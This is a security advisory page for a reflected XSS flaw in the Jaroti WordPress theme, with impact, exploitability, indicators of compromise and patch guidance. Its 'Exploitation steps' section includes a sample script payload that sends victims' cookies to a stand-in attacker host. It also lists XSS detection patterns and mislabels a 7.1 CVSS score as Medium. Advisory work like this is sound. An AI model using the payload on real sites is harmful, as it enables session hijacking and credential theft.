CVE-2026-25304
WordPress vulnerability analysis and mitigation

Overview

CVE-2026-25304 is a Reflected Cross-Site Scripting (XSS) vulnerability in the Jaroti WordPress theme developed by skygroup. It affects all versions of the Jaroti theme prior to 1.4.8, and was discovered by Tran Nguyen Bao Khanh (VCI - VNPT Cyber Immunity) and reported on January 15, 2026, with public disclosure on March 20–25, 2026. The vulnerability carries a CVSS v3.1 base score of 7.1 (Medium) (Patchstack).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically a Reflected XSS flaw. Malicious scripts are injected via unsanitized user-supplied input that is reflected back in the HTTP response without proper encoding or validation. Exploitation requires no authentication (unauthenticated attacker) but does require user interaction — a victim must click a crafted malicious link or visit a specially crafted URL that triggers the reflected payload in their browser context (Patchstack).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of a victim's browser session on the affected WordPress site. This can lead to session cookie theft, credential harvesting, redirection to malicious sites, defacement of page content for the victim, or delivery of further malware payloads. The scope is changed (S:C in CVSS), meaning the impact extends beyond the vulnerable component to the victim's browser environment, with low confidentiality, integrity, and availability impacts (Patchstack).

Exploitability

No public proof-of-concept exploit code has been identified at this time, and there is no confirmed evidence of in-the-wild exploitation. The EPSS score is approximately 0.033%, indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. However, Patchstack notes that vulnerabilities of this class are commonly used in mass-exploit campaigns targeting WordPress sites at scale (Patchstack).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites using the Jaroti theme (versions < 1.4.8) via web crawlers, Wappalyzer, or passive fingerprinting techniques.
  2. Identify vulnerable parameter: Locate the input parameter(s) in the Jaroti theme that are reflected unsanitized in the HTTP response (e.g., search fields, URL query parameters processed by the theme).
  3. Craft malicious URL: Construct a URL containing a reflected XSS payload in the vulnerable parameter, such as https://victim-site.com/?param=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.
  4. Deliver the payload: Send the crafted URL to a target user via phishing email, social media message, or other social engineering vector.
  5. Achieve objective: When the victim clicks the link and loads the page, the injected script executes in their browser, enabling cookie theft, session hijacking, or redirection to attacker-controlled infrastructure (Patchstack).

Indicators of compromise

  • Network: HTTP requests to the WordPress site containing URL-encoded XSS payloads (e.g., <script>, javascript:, onerror=, onload=) in query string parameters associated with the Jaroti theme.
  • Logs: Web server access logs showing GET requests with suspicious script tags or encoded equivalents (%3Cscript%3E, %22, %27) in theme-related URL parameters; referrer headers pointing to external attacker-controlled domains.
  • Browser/Client-Side: Unexpected outbound requests from victim browsers to unknown external domains immediately after visiting a site running the Jaroti theme, potentially indicating cookie exfiltration.

Mitigation and workarounds

The vendor has released Jaroti theme version 1.4.8, which patches this vulnerability. All WordPress site administrators running the Jaroti theme should update to version 1.4.8 or later immediately. As an interim measure, Patchstack offers a virtual patching/mitigation rule that blocks exploitation attempts until the theme can be updated. If neither option is immediately available, consider temporarily disabling the Jaroti theme and switching to an unaffected theme (Patchstack).

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2024-13784CRITICAL9.8
  • arforms-form-builder
NoYesAug 16, 2026
CVE-2026-17087HIGH7.5
  • wp-travel-engine
NoYesAug 16, 2026
CVE-2026-2497HIGH7.2
  • gallery-plugin
NoYesAug 16, 2026
CVE-2026-17608MEDIUM6.5
  • wp-compress-image-optimizer
NoYesAug 16, 2026
CVE-2026-2357MEDIUM6.4
  • bold-page-builder
NoYesAug 16, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management